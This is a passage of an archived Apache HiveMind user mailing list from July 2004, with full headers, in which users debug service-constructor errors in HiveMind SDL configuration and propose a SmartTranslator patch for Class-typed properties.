> SEVERE: Error at > file:/C:/dev900/java/adept/target/classes/META-INF/hivemodule.sdl, line 21, > column 43: Element construct/service/ClientController is not allowed here. > org.apache.hivemind.ApplicationRuntimeException: Unable to construct service > com.mckesson.adept.net.Controller: java.lang.NullPointerException > at > org.apache.hivemind.impl.servicemodel.AbstractServiceModelImpl.constructNewS > erviceImplementation(AbstractServiceModelImpl.java:156) > at > org.apache.hivemind.impl.servicemodel.AbstractServiceModelImpl.constructServ > iceImplementation(AbstractServiceModelImpl.java:130) > at > org.apache.hivemind.impl.servicemodel.SingletonServiceModel.getActualService > Implementation(SingletonServiceModel.java:69) > at $InnerProxy_fdbb040d47_3._service($InnerProxy_fdbb040d47_3.java) > at > $InnerProxy_fdbb040d47_3.brokerConnection($InnerProxy_fdbb040d47_3.java) > at > $SingletonProxy_fdbb040d29_2.brokerConnection($SingletonProxy_fdbb040d29_2.j > ava) > at com.mckesson.adept.net.HiveMindDemo.main(HiveMindDemo.java:21) > org.apache.hivemind.ApplicationRuntimeException: Unable to construct service > com.mckesson.adept.net.Controller: java.lang.NullPointerException > at > org.apache.hivemind.impl.servicemodel.AbstractServiceModelImpl.constructNewS > erviceImplementation(AbstractServiceModelImpl.java:156) > at > org.apache.hivemind.impl.servicemodel.AbstractServiceModelImpl.constructServ > iceImplementation(AbstractServiceModelImpl.java:130) > at > org.apache.hivemind.impl.servicemodel.SingletonServiceModel.getActualService > Implementation(SingletonServiceModel.java:69) > at $InnerProxy_fdbb040d47_3._service($InnerProxy_fdbb040d47_3.java) > at $InnerProxy_fdbb040d47_3.shutdown($InnerProxy_fdbb040d47_3.java) > at > $SingletonProxy_fdbb040d29_2.shutdown($SingletonProxy_fdbb040d29_2.java) > at com.mckesson.adept.net.HiveMindDemo.main(HiveMindDemo.java:33) > Exception in thread "main" > > I really don't know why, but I suspect it is because I'm not using the > service element correctly in the contruct element for the BuilderFactory. > Can anybody give me some insight as to what might be wrong? > > Richard Hensley > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 14 15:27:27 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50125 invoked from network); 14 Jul 2004 15:27:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Jul 2004 15:27:27 -0000 Received: (qmail 36983 invoked by uid 500); 14 Jul 2004 15:27:27 -0000 Delivered-To: [email protected] Received: (qmail 36970 invoked by uid 500); 14 Jul 2004 15:27:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36954 invoked by uid 99); 14 Jul 2004 15:27:26 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mail1.mckhboc.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Wed, 14 Jul 2004 08:27:18 -0700 Received: from 161.129.204.104 by mail1.mckhboc.com with ESMTP (Outbound Mail1 SMTP Relay (MMS v5.6.1)); Wed, 14 Jul 2004 08:27:00 -0700 X-Server-Uuid: E618535E-AE39-475D-9091-BC1AF22CB2F2 Received: by smtpout.hboc.com with Internet Mail Service (5.5.2653.19) id <N5TG51P1>; Wed, 14 Jul 2004 11:27:12 -0400 Received: from atlexc91nthub.hboc.com (ims2.mckesson.com [161.129.204.104] ) by atlexcsmtpb.hboc.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id N5TG513V; Wed, 14 Jul 2004 11:27:07 -0400 Received: by ims2.mckesson.com with Internet Mail Service (5.5.2653.19) id <364CY1CC>; Wed, 14 Jul 2004 11:27:59 -0400 From: "Hensley, Richard" <[email protected]> To: "'[email protected]'" <[email protected]> Message-ID: <[email protected]> Subject: RE: Trying to use a service constructor Date: Wed, 14 Jul 2004 11:26:41 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) X-WSS-ID: 6CEB8F491SO561115-01-01 Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Ok I changed construct (class=com.mckesson.adept.net.client.ConnectionPoolingController) { service { ClientController } } construct (class=com.mckesson.adept.net.client.ConnectionPoolingController) { service { "ClientController" } } and I get a java.lang.StackOverflowError Exception in thread "main" That can't be good... :) When I change it to "abc", I get a service point not found exception. So, I think that it must be somewhere in the service location code? Richard --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 14 15:39:34 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61763 invoked from network); 14 Jul 2004 15:39:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Jul 2004 15:39:34 -0000 Received: (qmail 74215 invoked by uid 500); 14 Jul 2004 15:39:11 -0000 Delivered-To: [email protected] Received: (qmail 74152 invoked by uid 500); 14 Jul 2004 15:39:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74043 invoked by uid 99); 14 Jul 2004 15:39:09 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mail1.mckhboc.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Wed, 14 Jul 2004 08:39:02 -0700 Received: from 161.129.204.104 by mail1.mckhboc.com with ESMTP (Outbound Mail1 SMTP Relay (MMS v5.6.1)); Wed, 14 Jul 2004 08:38:36 -0700 X-Server-Uuid: E618535E-AE39-475D-9091-BC1AF22CB2F2 Received: by smtpout.hboc.com with Internet Mail Service (5.5.2653.19) id <N5TG5F4K>; Wed, 14 Jul 2004 11:38:47 -0400 Received: from atlexc91nthub.hboc.com (ims2.mckesson.com [161.129.204.104] ) by atlexcsmtpb.hboc.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id N5TG5FT9; Wed, 14 Jul 2004 11:38:40 -0400 Received: by ims2.mckesson.com with Internet Mail Service (5.5.2653.19) id <364CY19C>; Wed, 14 Jul 2004 11:39:32 -0400 From: "Hensley, Richard" <[email protected]> To: "'[email protected]'" <[email protected]> Message-ID: <[email protected]> Subject: RE: Trying to use a service constructor Date: Wed, 14 Jul 2004 11:38:14 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) X-WSS-ID: 6CEB8CF01SO564775-01-01 Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N My next attempt was to add a setController/getController member to the ConnectionPoolingController class, however it seems that hivemind can only access interface members from within the FactoryBuilder, because I get the following exception: In this case, I changed: construct (class=com.mckesson.adept.net.client.ConnectionPoolingController) { service { "ClientController" } } to this: construct (class=com.mckesson.adept.net.client.ConnectionPoolingController) { set-service ( property="controller" service-id="ClientController" ) } org.apache.hivemind.ApplicationRuntimeException: Unable to construct service com.mckesson.adept.net.Controller: Unable to update property controller of object com.mckesson.adept.net.client.ConnectionPoolingController@115273a: Class org.apache.hivemind.util.PropertyAdaptor can not access a member of class com.mckesson.adept.net.client.ProxyController with modifiers "public" at org.apache.hivemind.impl.servicemodel.AbstractServiceModelImpl.constructNewS erviceImplementation(AbstractServiceModelImpl.java:156) at org.apache.hivemind.impl.servicemodel.AbstractServiceModelImpl.constructServ iceImplementation(AbstractServiceModelImpl.java:130) at org.apache.hivemind.impl.servicemodel.SingletonServiceModel.getActualService Implementation(SingletonServiceModel.java:69) at $InnerProxy_fdbe48826b_3._service($InnerProxy_fdbe48826b_3.java) at $InnerProxy_fdbe48826b_3.brokerConnection($InnerProxy_fdbe48826b_3.java) at $SingletonProxy_fdbe48824d_2.brokerConnection($SingletonProxy_fdbe48824d_2.j ava) Richard -----Original Message----- From: Hensley, Richard [mailto:[email protected]] Sent: Wednesday, July 14, 2004 8:27 AM To: '[email protected]' Subject: RE: Trying to use a service constructor Ok I changed construct (class=com.mckesson.adept.net.client.ConnectionPoolingController) { service { ClientController } } construct (class=com.mckesson.adept.net.client.ConnectionPoolingController) { service { "ClientController" } } and I get a java.lang.StackOverflowError Exception in thread "main" That can't be good... :) When I change it to "abc", I get a service point not found exception. So, I think that it must be somewhere in the service location code? Richard --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 14 15:48:18 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71077 invoked from network); 14 Jul 2004 15:48:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Jul 2004 15:48:18 -0000 Received: (qmail 93554 invoked by uid 500); 14 Jul 2004 15:48:18 -0000 Delivered-To: [email protected] Received: (qmail 93532 invoked by uid 500); 14 Jul 2004 15:48:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93513 invoked by uid 99); 14 Jul 2004 15:48:17 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mail1.mckhboc.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Wed, 14 Jul 2004 08:48:11 -0700 Received: from 161.129.204.104 by mail1.mckhboc.com with ESMTP (Outbound Mail1 SMTP Relay (MMS v5.6.1)); Wed, 14 Jul 2004 08:47:51 -0700 X-Server-Uuid: E618535E-AE39-475D-9091-BC1AF22CB2F2 Received: by smtpout.hboc.com with Internet Mail Service (5.5.2653.19) id <N5TG5GST>; Wed, 14 Jul 2004 11:48:04 -0400 Received: from atlexc91nthub.hboc.com (ims2.mckesson.com [161.129.204.104] ) by atlexcsmtpb.hboc.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id N5TG5GSL; Wed, 14 Jul 2004 11:47:57 -0400 Received: by ims2.mckesson.com with Internet Mail Service (5.5.2653.19) id <364CYF4K>; Wed, 14 Jul 2004 11:48:49 -0400 From: "Hensley, Richard" <[email protected]> To: "'[email protected]'" <[email protected]> Message-ID: <[email protected]> Subject: hivemodule.xml vs. hivemodule.sdl in HiveMind Date: Wed, 14 Jul 2004 11:47:31 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) X-WSS-ID: 6CEB8A2D1SO567774-02-01 Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I'm trying to get hivemind running in Eclipse so I can debug it. I have a question about which hivemodule file to include in the executable target. After poking around in the .jar file, I think the correct file is framework/src/descriptor/META-INF/hivemodule.sdl not framework/bin/META-INF/hivemodule.xml. Is this right? I'm using the 1.0-beta-1 download. Richard --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 14 16:09:25 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92059 invoked from network); 14 Jul 2004 16:09:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Jul 2004 16:09:25 -0000 Received: (qmail 40066 invoked by uid 500); 14 Jul 2004 16:09:25 -0000 Delivered-To: [email protected] Received: (qmail 40047 invoked by uid 500); 14 Jul 2004 16:09:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40033 invoked by uid 99); 14 Jul 2004 16:09:24 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mail1.mckhboc.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Wed, 14 Jul 2004 09:09:18 -0700 Received: from 161.129.204.104 by mail1.mckhboc.com with ESMTP (Outbound Mail1 SMTP Relay (MMS v5.6.1)); Wed, 14 Jul 2004 09:08:45 -0700 X-Server-Uuid: E618535E-AE39-475D-9091-BC1AF22CB2F2 Received: by smtpout.hboc.com with Internet Mail Service (5.5.2653.19) id <N5TG5243>; Wed, 14 Jul 2004 12:08:57 -0400 Received: from atlexc91nthub.hboc.com (ims2.mckesson.com [161.129.204.104] ) by atlexcsmtpb.hboc.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id N5TG52T0; Wed, 14 Jul 2004 12:08:55 -0400 Received: by ims2.mckesson.com with Internet Mail Service (5.5.2653.19) id <364CYHFN>; Wed, 14 Jul 2004 12:09:47 -0400 From: "Hensley, Richard" <[email protected]> To: "'[email protected]'" <[email protected]> Message-ID: <[email protected]> Subject: RE: Trying to use a service constructor Date: Wed, 14 Jul 2004 12:08:29 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) X-WSS-ID: 6CEB85061SO573508-03-01 Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Nevermind, bug in my code. I jumped the gun. Sorry for wasting anybody's time. Richard -----Original Message----- From: Hensley, Richard [mailto:[email protected]] Sent: Wednesday, July 14, 2004 8:27 AM To: '[email protected]' Subject: RE: Trying to use a service constructor Ok I changed construct (class=com.mckesson.adept.net.client.ConnectionPoolingController) { service { ClientController } } construct (class=com.mckesson.adept.net.client.ConnectionPoolingController) { service { "ClientController" } } and I get a java.lang.StackOverflowError Exception in thread "main" That can't be good... :) When I change it to "abc", I get a service point not found exception. So, I think that it must be somewhere in the service location code? Richard --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 14 17:08:10 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23985 invoked from network); 14 Jul 2004 17:08:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Jul 2004 17:08:10 -0000 Received: (qmail 99753 invoked by uid 500); 14 Jul 2004 17:08:10 -0000 Delivered-To: [email protected] Received: (qmail 99736 invoked by uid 500); 14 Jul 2004 17:08:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 46264 invoked by uid 99); 14 Jul 2004 16:47:05 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_80_90,HTML_MESSAGE X-Spam-Check-By: apache.org MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C469BF.ECB0EDCC" Subject: Smart Translator - Class type content-class: urn:content-classes:message X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1 Date: Wed, 14 Jul 2004 12:30:50 -0400 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Smart Translator - Class type Thread-Index: AcRpv+xfZwK3BDKYT4W2eVyyhceJzA== From: "Kurt R. Hoehn" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N ------_=_NextPart_001_01C469BF.ECB0EDCC Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hello, =20 The interface that I'm implementing has 2 getter methods that return type "Class" and it blows up every time on the getXXXX method calls. So I did some digging around with the Smart Translator and there is no editor for type Class which is by design. =20 Is there a reason for the Smart Translator not supporting other java fundamental types (i.e. Class)? =20 =20 I modified the SmartTranslator.java translate method and it seemed to work and it passed all Unit Tests. =20 public Object translate(Module contributingModule, Class propertyType, String inputValue) { ... =20 if (e =3D=3D null) { if( propertyType.getName().equals("java.lang.Class") ) { ClassResolver resolver =3D contributingModule.getClassResolver(); return resolver.findClass(inputValue); } else { throw new AplicationRuntimeException(RulesMessages.noPropertyEditor(propertyType)) ; } } =20 ... } =20 My hivemodule.sdl =20 service-point ( id=3DLockingConfiguration=20 =20 interface=3Dorg.apache.ojb.odmg.locking.LockingConfiguration) { invoke-factory( service-id=3Dhivemind.BuilderFactory ) { construct (class=3Dcom.etranscor.hivemind.ojb.configuration.LockingConfigurationImp= l ) { set ( property=3DlockManagerClass value=3D${ojb.lockmanager.class} ) =20 set ( property=3DlockMapClass value=3D${ojb.lockmap.class} ) } =20 } } =20 contribution (configuration-id=3Dhivemind.FactoryDefaults) { default (symbol=3Dojb.lockmanager.class value=3Dorg.apache.ojb.odmg.locking.LockManagerDefaultImpl) default (symbol=3Dojb.lockmap.class value=3Dorg.apache.ojb.odmg.locking.InMemoryLockMapImpl) } =20 -kurt h =20 ------_=_NextPart_001_01C469BF.ECB0EDCC Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <meta http-equiv=3DContent-Type content=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)"> <style> <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0in; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} span.EmailStyle17 {mso-style-type:personal-compose; font-family:Arial; color:windowtext;} @page Section1 {size:8.5in 11.0in; margin:1.0in 1.25in 1.0in 1.25in;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DEN-US link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Hello,<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp; The interface that I&#8217;m = implementing has 2 getter methods that return type &#8220;Class&#8221; and it blows = up every time on the getXXXX method calls.&nbsp; So I did some digging around = with the Smart Translator and there is no editor for type Class which is by = design.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Is there a reason for the Smart Translator not = supporting other java fundamental types (i.e. Class)? &nbsp;<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>I modified the &nbsp;SmartTranslator.java = &nbsp;translate method &nbsp;and it seemed to work and it passed all Unit = Tests.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = color=3Dblue face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier New"; color:blue'>public</span></font><font size=3D2 face=3D"Courier = New"><span style=3D'font-size:10.0pt;font-family:"Courier New"'> Object = translate(Module contributingModule, Class propertyType, String = inputValue)<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt; font-family:"Courier New"'>{</span></font><font size=3D2 = face=3DArial><span style=3D'font-size:10.0pt;font-family:Arial'><o:p></o:p></span></font></p= > <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = color=3Dblue face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier New"; color:blue'>&#8230;<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = color=3Dblue face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier New"; color:blue'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = color=3Dblue face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier New"; color:blue'>&nbsp; if</span></font><font size=3D2 face=3D"Courier = New"><span style=3D'font-size:10.0pt;font-family:"Courier New"'> (e =3D=3D <font = color=3Dblue><span style=3D'color:blue'>null</span></font>)<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier New"'>&nbsp; = {<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = color=3Dblue face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier New"; color:blue'>&nbsp;&nbsp;&nbsp;&nbsp;if( p</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'>ropertyType.getName().equals(&quot;java.lang.Class&quot;) )<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier New"'>&nbsp;&nbsp;&nbsp; = {<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ClassResolver resolver =3D = contributingModule.getClassResolver();<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <font color=3Dblue><span style=3D'color:blue'>return</span></font> resolver.findClass(inputValue);<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier New"'>&nbsp;&nbsp;&nbsp; = }<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = color=3Dblue face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier New"; color:blue'>&nbsp;&nbsp;&nbsp; else<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier New"'>&nbsp;&nbsp;&nbsp; = {<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = color=3Dblue face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier New"; color:blue'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = throw</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier New"'> <font color=3Dblue><span style=3D'color:blue'>new</span></font> = AplicationRuntimeException(RulesMessages.noPropertyEditor(propertyType));= <o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier New"'>&nbsp;&nbsp;&nbsp; = }<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier New"'>&nbsp; = }<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New"'>&#8230;<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New"'>}<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier New"'>My = hivemodule.sdl<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; service-point ( id=3DLockingConfiguration </span></font><font size=3D2 face=3D"Courier = New"><span style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp; interface=3Dorg.apache.ojb.odmg.locking.LockingConfiguration)</span></fon= t><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = {</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp; invoke-factory( service-id=3Dhivemind.BuilderFactory )</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp; {</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; construct (class=3Dcom.etranscor.hivemind.ojb.configuration.LockingConfigurationImp= l)</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = {</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 